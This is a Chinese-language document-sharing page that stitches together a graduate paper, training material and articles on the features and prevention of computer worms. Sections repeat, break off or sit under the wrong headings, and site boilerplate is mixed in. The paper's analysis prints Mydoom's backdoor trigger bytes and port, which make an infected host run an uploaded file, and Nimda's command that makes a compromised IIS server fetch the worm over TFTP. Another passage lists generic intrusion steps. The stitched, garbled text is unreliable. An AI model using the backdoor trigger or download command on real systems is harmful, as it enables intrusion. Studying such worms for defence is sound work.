蠕虫病毒的特征与防治
蠕虫病毒的特征与防治

资料范本本资料为word版本,可以直接编辑和打印,感谢您的下载蠕虫病毒的特征与防治地点:__________________时间:__________________说明:本资料适用于约定双方经过谈判,协商而共同承认,共同遵守的责任与义务,仅供参考,文档可直接下载或修改,不需要的部分可直接删除,使用时请详细阅读内容研究生课程论文(2008-2009学年第二学期)蠕虫病毒的特征与防治摘要随着网络的发展,以网络传播的蠕虫病毒利用网络全球互联的优势和计算机系统及网络系统安全性上的漏洞,己经成为计算机系统安全的一大的威胁。
采用网络传播的蠕虫病毒与传统的计算机病毒在很多方面都有许多不同的新特点。
本文对蠕虫病毒的特征和防御策略进行了研究,透彻分析了几个流行的蠕虫病毒的本质特征和传播手段,并提出了防治未知病毒以及变形病毒的解决方案与虚拟机相结合的基于攻击行为的着色判决PN机蠕虫检测方法。
关键词: 蠕虫,病毒特征,病毒防治1引言“蠕虫”这个生物学名词于1982年由Xerox PARC的John F. Shoeh等人最早引入计算机领域,并给出了计算机蠕虫的两个最基本的特征:“可以从一台计算机移动到另一台计算机”和“可以自我复制”。
最初,他们编写蠕虫的目的是做分布式计算的模型试验。
1988年Morris蠕虫爆发后,Eugene H. Spafford为了区分蠕虫和病毒,给出了蠕虫的技术角度的定义。
“计算机蠕虫可以独立运行,并能把自身的一个包含所有功能的版本传播到另外的计算机上。
”计算机蠕虫和计算机病毒都具有传染性和复制功能,这两个主要特性上的一致,导致二者之间是非常难区分的。
近年来,越来越多的病毒采取了蠕虫技术来达到其在网络上迅速感染的目的。
因而,“蠕虫”本身只是“计算机病毒”利用的一种技术手段[1]。
2蠕虫病毒的特征及传播1、一般特征:(1)独立个体,单独运行;(2)大部分利用操作系统和应用程序的漏洞主动进行攻击;(3)传播方式多样;(4)造成网络拥塞,消耗系统资源;(5)制作技术与传统的病毒不同,与黑客技术相结合。
蠕虫病毒

【摘要】:凡能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。
所以从这个意义上说,蠕虫也是一种病毒。
蠕虫病毒,作为对互联网危害严重的一种计算机程序,其破坏力和传染性不容忽视。
与传统的病毒不同,蠕虫病毒以计算机为载体,以网络为攻击对象。
本文主要介绍蠕虫病毒的分类、概念、特点传播途径、典型蠕虫、防范措施和发展趋势等。
【关键词】:蠕虫病毒影响防范发展目录第一章蠕虫病毒概述 (1)1.1 蠕虫病毒的概念 (1)1.2 蠕虫病毒的成因 (1)1.3 蠕虫病毒的特性 (1)第二章蠕虫病毒分析 (2)2.1 蠕虫病毒分类分析 (2)2.1.1主机蠕虫 (2)2.1.2 网络蠕虫 (2)2.2 蠕虫病毒传播途径 (2)2.3 典型蠕虫病毒 (3)2.3.1 熊猫烧香病毒的概念 (3)2.3.2 熊猫烧香病毒的危害 (3)2.3.3熊猫烧香病毒的现象 (3)第三章蠕虫病毒的防范 (5)3.1 怎样防范蠕虫病毒 (5)3.2 蠕虫病毒的解决方案(例:熊猫烧香病毒) (6)第四章蠕虫病毒发展趋势 (11)参考文献 (12)第一章蠕虫病毒概述1.1 蠕虫病毒的概念1.2 蠕虫病毒的成因利用操作系统和应用程序的漏洞主动进行攻击此类病毒主要是“红色代码”和“尼姆亚”,以及依然肆虐的“求职信”等。
由于IE浏览器的漏洞(IFRAMEEXECCOMMAND),使得感染了“尼姆亚”病毒的邮件在不去手工打开附件的情况下病毒就能激活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件,只要不去打开附件,病毒不会有危害。
“红色代码”是利用了微软IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播,SQL蠕虫王病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击。
1.3 蠕虫病毒的特性蠕虫和传统病毒都具有传染性和复制功能,这两个主要特性上的一致,导致人们在二者之间非常难区分。
尤其是近年来,越来越多的传统病毒采取了部分蠕虫的技术,而具有破坏性的蠕虫也采取了部分传统病毒的技术,从而更加剧了这种情况。
实训7-2蠕虫病毒的查杀与防范.

实训7-2蠕虫病毒的查杀与防范引言蠕虫病毒是一种恶意软件,通过网络传播并感染计算机系统。
蠕虫病毒可以自动复制和传播自己,对网络安全造成严重威胁。
在本文中,我们将介绍蠕虫病毒的特征和传播方式,并提供一些常用的查杀和防范方法。
蠕虫病毒的特征蠕虫病毒与其他恶意软件不同之处在于其具备自我复制和传播的能力。
蠕虫病毒可以通过网络传播,并在感染新主机后再次复制并传播自己。
这种自我复制和传播的能力使得蠕虫病毒具有迅速传播和蔓延的潜力。
另一个蠕虫病毒的特征是其破坏性。
蠕虫病毒可以危害计算机系统的正常功能,并可能导致数据损失、系统崩溃等严重后果。
一些蠕虫病毒还具备隐藏性,可以在感染主机之后长时间潜伏而不被察觉。
蠕虫病毒的传播方式蠕虫病毒可以通过多种方式传播。
以下是一些常见的传播途径:1.电子邮件附件:蠕虫病毒可以通过电子邮件附件传播。
当用户打开蠕虫病毒的电子邮件附件时,病毒将被激活并感染用户的计算机系统。
2.可执行文件:蠕虫病毒可以附加在可执行文件中,当用户运行该可执行文件时,病毒将开始感染用户的计算机系统。
3.共享文件夹:蠕虫病毒可以通过共享文件夹传播。
当用户访问感染的共享文件夹时,病毒将利用网络传播自己到其他计算机系统。
4.操作系统漏洞:蠕虫病毒可以利用操作系统的漏洞来传播自己。
一旦蠕虫病毒感染了具有漏洞的计算机系统,它可以利用该漏洞来感染其他主机和系统。
蠕虫病毒的查杀方法及时发现和查杀蠕虫病毒对于保护计算机系统的安全至关重要。
以下是一些常用的蠕虫病毒查杀方法:1.使用杀毒软件:杀毒软件是查杀蠕虫病毒的最常见和有效的方法之一。
杀毒软件可以及时检测和清除计算机系统中的病毒,并提供实时保护。
2.更新操作系统:定期更新操作系统是防范蠕虫病毒传播的重要措施。
操作系统提供的更新补丁通常包含了对已知漏洞的修复,减少了蠕虫病毒感染的机会。
3.禁用自动运行:蠕虫病毒通常利用自动运行功能来感染计算机系统。
禁用自动运行功能可以阻止蠕虫病毒在用户运行可执行文件时自动启动。
蠕虫病毒

分类
根据蠕虫病毒在计算机及络中传播方式的不同,人们大致将其分为五种。
1、电子邮件E-mail蠕虫病毒
通过电子邮件传播的蠕虫病毒,它以附件的形式或者是在信件中包含有被蠕虫所感染的站链接,当用户点击 阅读附件时蠕虫病毒被激活,或在用户点击那个被蠕虫所感染站链接时被激活感染蠕虫病毒。
2、即时通讯软件蠕虫病毒
第一步:用各种方法收集目标主机的信息,找到可利用的漏洞或弱点。方法包括用扫描器扫描主机,探测主 机的操作系统类型、版本,主机名,用户名,开放的端口,开放的服务,开放的服务器软件版本等。当然是信息 搜集的越全越好。搜集完信息后进入第二步。
第二步:针对目标主机的漏洞或缺陷,采取相应的技术攻击主机,直到获得主机的管理员权限。对搜集来的 信息进行分析,找到可以有效利用的信息。如果有现成的漏洞可以利用,上找到该漏洞的攻击方法,如果有攻击 代码就直接COPY下来,然后用该代码取得权限;如果没有现成的漏洞可以利用,就用根据搜集的信息试探猜测用 户密码,另一方面试探研究分析其使用的系统,争取分析出—个可利用的漏洞。
(三)、传播更快更广
蠕虫病毒比传统病毒具有更大的传染性,它不仅仅感染本地计算机,而且会以本地计算机为基础,感染络中 所有的服务器和客户端。蠕虫病毒可以通过络中的共享文件夹、电子邮件、恶意页以及存在着大量漏洞的服务器 等途径肆意传播,几乎所有的传播手段都被蠕虫病毒运用得淋漓尽致。因此,蠕虫病毒的传播速度可以是传统病 毒的几百倍,甚至可以在几个小时内蔓延全球。
感谢观看
结构原理
结构
原理
蠕虫病毒的程序结构通常包括三个模块:
(1)传播模块:负责蠕虫的传播,它可以分为扫描模块、攻击模块和复制模块三个子模块。其中,扫描模块 负责探测存在漏洞的主机;攻击模块按漏洞攻击步骤自动攻击找到的对象;复制模块通过原主机和新主机交互将 蠕虫程序复制到新主机并启动。
简述蠕虫的特点和防治手段

简述蠕虫的特点和防治手段
蠕虫是一种可以自行传播的恶意软件,具有以下特点:
1. 自我复制:蠕虫可以自动复制自己,利用计算机网络传播至其他主机。
2. 隐蔽性:蠕虫通常会隐藏在正常的文件或程序中,使用户难以察觉其存在。
3. 破坏性:蠕虫可以破坏或删除文件,占用大量系统资源,导致系统崩溃或运行缓慢。
4. 恶意功能:蠕虫可以窃取用户敏感信息、传播垃圾邮件、进行分布式拒绝服务攻击等恶意行为。
为了防止蠕虫破坏系统和网络,可以采取以下防治手段:
1. 安全意识教育:用户应该加强对网络安全的认知,避免点击未知链接或下载可疑文件。
2. 安装杀毒软件:及时安装并更新杀毒软件,可以及早发现并清除潜在的蠕虫。
3. 更新系统和应用程序:及时安装操作系统和应用程序的安全更新,修补漏洞,减少蠕虫入侵的机会。
4. 防火墙设置:配置防火墙,限制对计算机的未经授权访问,
减少蠕虫的传播范围。
5. 网络流量监测:使用网络监测工具监控网络流量,及时发现可疑活动并采取相应的措施。
6. 强密码和多因素认证:使用复杂的密码,并启用多因素认证,提高系统安全性。
7. 定期备份数据:定期备份重要数据,以防止其被蠕虫破坏或加密。
8. 及时修复漏洞:及时修复系统和应用程序中的漏洞,减少被蠕虫利用的机会。
蠕虫病毒的一般处置方案

蠕虫病毒的一般处置方案随着计算机技术的飞速发展,各种病毒也越来越多地出现在我们的互联网世界中。
尤其是蠕虫病毒,由于它的自我复制和传播能力极强,一旦扩散开来,对计算机网络和用户带来的破坏是非常严重的。
为了保护计算机网络和用户的数据安全,我们需要了解蠕虫病毒的一般处置方案。
什么是蠕虫病毒蠕虫病毒是一种利用网络空间进行传播并自我复制的恶意代码,其主要特点是在网络上迅速传播、危害大、范围广。
蠕虫病毒通过利用网络上的漏洞或者弱点进行攻击,从而与其他主机生成新的感染行为,不断扩散,给计算机和网络带来极大的危害。
常见的蠕虫病毒有蠕虫、爆破蠕虫、邮件蠕虫等。
蠕虫病毒的预防与防治注意网络安全作为计算机用户,我们首先应该注意网络安全,并采取一定的预防措施。
可以查看操作系统补丁以及安全更新,并及时安装;安装杀毒软件,并保持及时更新杀毒软件的病毒库文件;禁止使用弱口令以及禁止共享敏感文件;只下载和运行可靠的应用程序;打开和接收电子邮件附件应慎重,不要轻易打开未知来源的附件;使用智能型防火墙来过滤网络流量等等。
这些安全措施可以最大程度地减少蠕虫病毒的传播和危害。
安装杀毒软件杀毒软件是防治计算机中常见恶意代码的重要手段。
我们可以根据操作系统的环境、硬件配置、性能特征选择适合自己的杀毒软件,然后及时更新病毒库文件,保证杀毒软件可以识别新出现的病毒,并及时进行拦截和处置。
及时修补漏洞很多蠕虫病毒利用系统中的软件漏洞进行攻击,在开放端口中搜索额外的受感染目标。
因此,及时修补漏洞是很重要的,可以有效预防蠕虫病毒的感染和扩散。
操作系统或软件提供商会在出现漏洞时发布相应的安全更新,安装修补程序是修补漏洞的主要方式,因此我们需要定期检查漏洞并进行修补。
摆脱蠕虫病毒的方法如果我们的计算机被蠕虫病毒感染,应当及时采取措施进行摆脱。
第一,隔离感染机器,及时关闭网络连接。
在某些情况下需要停止运行与网络有关的程序。
第二,运行杀毒软件,对病毒进行扫描和清除。
如何防范蠕虫病毒

如何防范蠕虫病毒蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,那么如何防范蠕虫病毒呢?接下来由店铺为大家推荐防范蠕虫病毒的方法,希望对你有所帮助!蠕虫和普通病毒区别:对于防毒杀毒长久以来都是计算机使用者比较头疼的问题,很多人都存在以上的疑问和误区。
针对近年来,病毒开始由传统形向网络蠕虫和隐蔽的木马病毒发展,笔者这篇文章就以这两个祸害开刀,和大家一步一步谈谈从杀到防搞定病毒。
随着我国宽带爆炸式的发展,蠕虫病毒引起的危害开始快速的显现!蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文件寄生(有的只存在于内存中),快速的自身复制并通过网络感染,以及和黑客技术相结合等等!在产生的破坏性上,蠕虫病毒也不是普通病毒所能比拟的,网络的发展使得蠕虫可以在短短的时间内蔓延整个网络,造成网络瘫痪。
相信以前的冲击波、震荡波大家一定还没忘记吧。
1、蠕虫和普通病毒区别2、传播特点蠕虫一般都是通过变态的速度复制自身并在互联网环境下进行传播,目标是互联网内的所有计算机。
这样一来局域网内的共享文件夹,电子邮件,网络中的恶意网页,大量安装了存在漏洞操作系统的服务器就都成为蠕虫传播的良好途径,使得蠕虫病毒可以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使得人们手足无策!这其中通过操作系统漏洞或者通过IE漏洞攻击的方式最为常见。
3、蠕虫的预防解决蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞,这里的漏洞或者说是缺陷,我们分为2种:软件的和人为的。
软件上的缺陷,如系统漏洞,微软IE和outlook的自动执行漏洞等等,需要大家经常更新系统补丁或者更换新版本软件。
而人为的缺陷,主要是指的是计算机用户的疏忽。
例如,当收到QQ好友发来的照片、游戏的时候大多数人都会报着好奇去点击的,从而被感染上了病毒。
个人用户对蠕虫病毒的防范措施:通过上述的分析,我们了解蠕虫的特点和传播的途径,因此防范需要注意以下几点:1、选择合适的杀毒软件杀毒软件必须提供内存实时监控和邮件实时监控以及网页实时监控!国产软件无论是在功能和反应速度以及病毒更新频率上都做的不错,相对国外的反病毒软件他们对于像QQ这类国产病毒具有明显优势,同时消耗系统资源也比较少,大家可以放心使用。
蠕虫病毒原理

蠕虫病毒原理
蠕虫病毒是一种能够自动复制和传播的恶意软件程序。
它利用计算机网络的漏洞,通过网络连接传播到其他计算机,感染并复制自身。
蠕虫病毒具有以下特点:
1. 自动复制:蠕虫病毒可以自动复制自己,并利用网络连接将复制的副本传播到其他计算机。
它不需要用户的介入或文件传输,可以通过网络针对其他计算机进行扩散。
2. 利用漏洞:蠕虫病毒利用计算机网络中的漏洞,如操作系统漏洞、应用程序漏洞等,来感染和传播。
一旦感染了某台计算机,就会利用漏洞攻击其他未修补漏洞的计算机。
3. 快速传播:由于蠕虫病毒的自动复制和传播特性,它能够在网络上快速传播,感染大量计算机。
这会极大地影响网络的正常运行,并且很难进行控制和清除。
4. 破坏性:蠕虫病毒除了传播自身外,还可能对感染的计算机造成破坏。
它可以删除、损坏或盗取计算机上的文件和敏感信息,甚至可以控制被感染计算机的操作。
为了保护计算机免受蠕虫病毒的感染,用户应采取以下预防措施:
1. 安装安全补丁:及时安装操作系统和应用程序的安全补丁,以修补已知漏洞。
2. 使用防病毒软件:安装并定期更新防病毒软件,及时扫描和清除潜在的病毒。
3. 谨慎打开附件:不打开来自未知或不可信源的文件和链接,以防止蠕虫病毒通过电子邮件或即时消息传播。
4. 防火墙设置:配置和使用防火墙,限制计算机与未经授权的网络之间的通信,减少蠕虫病毒的传播机会。
5. 定期备份数据:定期备份重要文件和数据,以防止蠕虫病毒的破坏。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
研究生课程论文(2008-2009学年第二学期)蠕虫病毒的特征与防治摘要随着网络的发展,以网络传播的蠕虫病毒利用网络全球互联的优势和计算机系统及网络系统安全性上的漏洞,己经成为计算机系统安全的一大的威胁。
采用网络传播的蠕虫病毒与传统的计算机病毒在很多方面都有许多不同的新特点。
本文对蠕虫病毒的特征和防御策略进行了研究,透彻分析了几个流行的蠕虫病毒的本质特征和传播手段,并提出了防治未知病毒以及变形病毒的解决方案与虚拟机相结合的基于攻击行为的着色判决PN机蠕虫检测方法。
关键词: 蠕虫,病毒特征,病毒防治1引言“蠕虫”这个生物学名词于1982年由Xerox PARC的John F. Shoeh等人最早引入计算机领域,并给出了计算机蠕虫的两个最基本的特征:“可以从一台计算机移动到另一台计算机”和“可以自我复制”。
最初,他们编写蠕虫的目的是做分布式计算的模型试验。
1988年Morris蠕虫爆发后,Eugene H. Spafford为了区分蠕虫和病毒,给出了蠕虫的技术角度的定义。
“计算机蠕虫可以独立运行,并能把自身的一个包含所有功能的版本传播到另外的计算机上。
”计算机蠕虫和计算机病毒都具有传染性和复制功能,这两个主要特性上的一致,导致二者之间是非常难区分的。
近年来,越来越多的病毒采取了蠕虫技术来达到其在网络上迅速感染的目的。
因而,“蠕虫”本身只是“计算机病毒”利用的一种技术手段[1]。
2蠕虫病毒的特征及传播1、一般特征:(1)独立个体,单独运行;(2)大部分利用操作系统和应用程序的漏洞主动进行攻击;(3)传播方式多样;(4)造成网络拥塞,消耗系统资源;(5)制作技术与传统的病毒不同,与黑客技术相结合。
2、病毒与蠕虫的区别(l)存在形式上病毒寄生在某个文件上,而蠕虫是作为独立的个体而存在;(2)传染机制方面病毒利用宿主程序的运行,而蠕虫利用系统存在的漏洞;(3)传染目标病毒针对本地文件,而蠕虫针对网络上的其他计算机;(4)防治病毒是将其从宿主文件中删除,而防治蠕虫是为系统打补丁。
3、传播过程:(1)扫描:由蠕虫的扫描功能模块负责探测存在漏洞的主机。
(2)攻击:攻击模块按漏洞攻击步骤自动攻击步骤1中找到的对象,取得该主机的权限(一般为管理员权限),获得一个shell。
(3)现场处理:进入被感染的系统后,要做现场处理工作,现场处理部分工作主要包括隐藏、信息搜集等等(4)复制:复制模块通过原主机和新主机的交互将蠕虫程序复制到新主机并启动。
每一个具体的蠕虫在实现这四个部分时会有不同的侧重,有的部分实现的相当复杂,有的部分实现的则相当简略。
尼姆达病毒是一个比较典型的病毒与蠕虫技术相结合的蠕虫病毒,它几乎包括目前所有流行病毒的传播手段,并且可以攻击Win98/NT/2000/XP等所有的Windows操作平台。
该病毒有以下4种传播方式: (1)通过Email发送在客户端看不到的邮件附件程序sample.exe,该部分利用了微软的OE信件浏览器的漏洞;(2)通过网络共享的方式来传染给局域网络上的网络邻居,使用设置密码的共享方式可以有效的防止该病毒的此种传播方式;(3)通过没有补丁的IIS服务器来传播,该传播往往是病毒屡杀不绝的原因,该方式利用了微软IIS的UNICODE漏洞;(4)通过感染普通的文件来传播,在这一点上和普通的病毒程序相同。
4、蠕虫病毒的传播趋势目前的流行病毒越来越表现出以下三种传播趋势:1、通过邮件附件传播病毒,如Mydoom等邮件病毒;2、通过无口令或者弱口令共享传播病毒,如Nimda、Netskey等;3、利用操作系统或者应用系统漏洞传播病毒,如冲击波蠕虫、震荡波蠕虫等。
3目前流行的蠕虫病毒3.1 Mydoom邮件病毒Novarg/Mydoom.a蠕虫是2004年1月28日开始传入我国的一个通过邮件传播的蠕虫。
在全球所造成的直接经济损失至少达400亿美元,是2004年1月份十大病毒之首。
该蠕虫利用欺骗性的邮件主题和内容来诱使用户运行邮件中的附件。
拒绝服务的方式是向网站的WEB服务发送大量GET请求,在传播和攻击过程中,会占用大量系统资源,导致系统运行变慢。
蠕虫还会在系统上留下后门,通过该后门,入侵者可以完全控制被感染的主机[2]。
该蠕虫没有使用特别的技术和系统漏洞,之所以能造成如此大的危害,主要还是由于人们防范意识的薄弱,和蠕虫本身传播速度较快的缘故。
该蠕虫主要通过电子邮件进行传播,它的邮件主题、正文和所带附件的文件名都是随机的,另外它还会利用Kazaa的共享网络来进行传播。
病毒文件的图标和windows系统记事本(NOTEPAD.EXE)图标非常相似,运行后会打开记事本程序,显示一些乱码信息,其实病毒已经开始运行了。
病毒会创建名为“SwebSipcSmtxSO”的排斥体来判断系统是否己经被感染。
蠕虫在系统中寻找所有可能包含邮件地址的文件,包括地址簿文件、各种网页文件等,从中提取邮件地址,作为发送的目标。
病毒会避免包含以下信息的域名:gov、mil、borlan、bsd、example等,病毒同样会避免包含以下信息的电子邮件帐户:accoun、ca、certific、、icrosoft、info、linux等,当病毒检测到邮件地址中含有上述域名或帐户时则忽略该地址,不将其加入到发送地址链表中。
Worm.Mydoom.a病毒主程序流程如图3-1所示,后门程序shimgapi.dll如图3-2所示:图3-1 Mydoom病毒主体流程图图3-2 shimgapi.dll流程图Mydoom蠕虫病毒除造成了网络资源的浪费,阻塞网络,被攻击网站不能提供正常服务外,最大的危险在于安装了后门程序。
该后门即shimgapi.dll,通过修改注册表,使自身随着EXPLORER的启动而运行,将自己加载到了资源管理器的进程空间中。
后门监听3127端口,如果该端口被占用,则递增,但不大于3198。
后门提供了两个功能:(1)作为端口转发代理;(2)作为后门,接收上传程序并执行。
当3127端口收到连接之后,如果recv的第一个字符是x04,转入端口转发流程。
若第二个字符是0x01,则取3、4两个字符作为目标端口,取第5-8四个字节作为目标IP地址,进行连接并和当前socket数据转发。
recv的第一个字符如果是x85,则转入执行命令流程。
先接收四个字节,转成主机字节序后验证是否是x133c9ea2,验证通过则创建临时文件接收数据,接收完毕运行该文件。
也就是说,只要我们把任意一个可执行文件的头部,加上五个字符:x85133c9ea2,作为数据发送到感染了Mydoom.a蠕虫机器的3127端口,这个文件,就会在系统上被执行,从而对被感染系统的安全造成了极大的威胁。
Nimda蠕虫病毒在Nimda蠕虫病毒出现以前,“蠕虫”技术一直是独立发展的。
Nmida病毒第一次将“蠕虫”技术和“计算机病毒”技术结合起来。
从Nimda的攻击方式来看,Nimda蠕虫病毒只攻击微软的Win X系列操作系统,它通过电子邮件、网络临近共享文件、IE浏览器的内嵌MIME类型自动执行漏洞、IIS服务器文件目录遍历漏洞、Code Red II和Sad mind/IIS蠕虫留下的后门共五种方式进行传播,其中前三种方式是病毒传播方式。
关于蠕虫病毒的分析,在很多文献[3]中都有提到,本文在这些文献的基础上,重点针对几种典型的蠕虫病毒在技术实现上的特点进行分析,以期找到他们的一些共性。
1.被利用的系统漏洞描述(1)微软IE异常处理MIME头漏洞IE在处理MIME头中“Content2Type:”处指定的某些类型时存在问题,攻击者可以利用这类缺陷在IE客户端执行任意命令。
(2)Microsoft IIS UniCode解码目录遍历漏洞微软IIS4.0和IIS5.0在UniCdoe字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。
(3)Microsoft IIS CGI文件名错误解码漏洞微软IIS4.0/5.0在处理CGI程序文件名时存在一个安全漏洞,由于错误地对文件名进行了两次解码,攻击者可能利用这个漏洞执行任意系统命令。
(4)“Code Red II”和Sadmind/IIS蠕虫留下的后门程序。
2.传播方式(l)邮件传播蠕虫会向被攻击者发送一封携带了蠕虫附件的邮件。
这个邮件由两部分MIME类型的信息组成:第一部分的MIME类型为“text/html”,但却没有包含文本,因此看起来是空的;第二部分的MIME类型为“a udio/x2wav”,但它实际上携带的是一个名为“Readme.exe”的base64编码的可执行附件。
利用了“微软IE异常处理MIME头漏洞”安全漏洞,任何运行在x86平台下并且使用微软IE5.5SP1或之前版本(IE5.01SP2除外)来显示HTML邮件的邮件客户端软件,都将自动执行邮件附件。
用户甚至只需打开或预览邮件即可使蠕虫被执行[4]。
被蠕虫攻击的目标邮件的地址从下列两个来源中获得:①用户Web Cache文件夹中的*.htm和*.html文件②用户通过MAPI服务收到Email邮件的内容蠕虫在这些文件中搜索看起来像邮件地址的字符串,然后向这些地址发送一份包含蠕虫拷贝的邮件。
Nimda蠕虫在Windows注册表中记录最后一批邮件发送的时间,然后每十天重复搜索邮件地址并重新发送蠕虫邮件。
(2)IIS WEB服务器传播蠕虫会利用两个IIS服务器的目录遍历漏洞和以前的一些IIS蠕虫(Rde CodeII和Sad mind/IIS)留下的后门程序来进行传播。
蠕虫按照下列几率来选择攻击目标的IP地址:①50%的几率,在与本地IP地址前两字节相同的地址(B类网络)中选择一个②25%的几率,在与本地IP地址前一字节相同的地址(A类网络)中选择一个③25%的几率,随机选择IP地址。
蠕虫首先会启动一个TFTP服务器,监听UDP/69端口。
在开启TFTP服务器和确定攻击P1地址之后,Nimda就开始对这个IP地址进行扫描。
首先,扫描“RdeCodeII”留下的后门。
由于被“RedCodeII”攻击过的系统中的Web虚拟目录中会留下一个名为Root.exe的后门程序,Nimda就首先扫描“/Scripts/root.exe”,如果这个程序存在的话,Nimda蠕虫就企图通过它在系统上执行命令。
它执行类似下列命令来向其发送蠕虫代码:GET/scripts/root.exe?/c+tftp+2i+localip+GET+Admin.dll HTTP/1.0其中Localip是本主机的IP地址,这样就通过TFTP协议将本地的Admin.dll文件传播过去,而这个Admin.dll实际上就是蠕虫代码本身,只不过它在这里是以*.dll文件的形式存在。